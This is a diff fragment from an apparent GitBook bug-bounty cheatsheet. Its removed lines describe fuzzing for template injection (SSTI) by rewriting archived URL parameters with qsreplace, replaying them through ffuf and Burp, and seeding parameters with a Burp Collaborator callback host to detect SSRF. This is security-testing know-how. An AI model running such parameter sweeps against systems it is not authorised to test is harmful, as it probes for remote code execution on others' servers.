1585	-	![](https://pbs.twimg.com/media/Eir5smxXcAcJ4QX?format=jpg\&name=large)\</img>
1586	-
1587	-	Quick SSTI (RCE) Tip from Twitter
1588	-
1589	-	```
1590	-	#Full credit goes too - https://twitter.com/MrDamanSingh/status/1317042176337932291
1591	-
1592	-	Had to save this here as I thought it was pretty sick
1593	-
1594	-	root@m0chan:~ waybackurls http://target.com \| qsreplace "m0chan" > fuzz.txt
1595	-	root@m0chan:~ ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
1596	-	(captured requests in burp)
1597	-	search: m0chan81 in burp
1598	-
1599	-	Could also apply to a few other things beside SSTI
1600	-
1601	-	WIP: Could also pass all QReplaced URLs to Nuclei and Grep for 81 and trigger alert?
1602	-	```
1603	-
1604	-	QSReplace
1605	-
1606	-	```
1607	-	I wasnt sure where to add the section on QSReplace but felt it warranted it's own section.
1608	-
1609	-	#https://github.com/tomnomnom/qsreplace
1610	-
1611	-	Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
1612	-
1613	-
1614	-	This can be super useful for findings things such as RXSS, LFI, SSRF , SSTI & RCE.
1615	-
1616	-	For example we could replace all parameters with a burp collaborator such as
1617	-
1618	-	root@m0chan:~ cat urls.txt \| qsreplace collab.m0chan.co.uk
1619	-	https://example.com/path?one=collab.m0chan.co.uk&two=collab.m0chan.co.uk
1620	-	https://example.com/pathtwo?one=collab.m0chan.co.uk&two=collab.m0chan.co.ukl
1621	-	https://example.net/a/path?one=collab.m0chan.co.uk&two=collab.m0chan.co.uk
1622	-
1623	-	```
1624	-

1		-	# Bug-Bounty Checklist
	1	+	# Bug-Bounty Cheatsheet
2	2
3	3		#### Random DNS Pic <a href="#random-dns-pic" id="random-dns-pic"></a>
4	4
		skipped 128 lines

1	+	# 👻 Cheat-sheet's
2	+
3	+

1	-	# Page 1
2	-
3	-

GITBOOK-23: change request with no subject merged in GitBook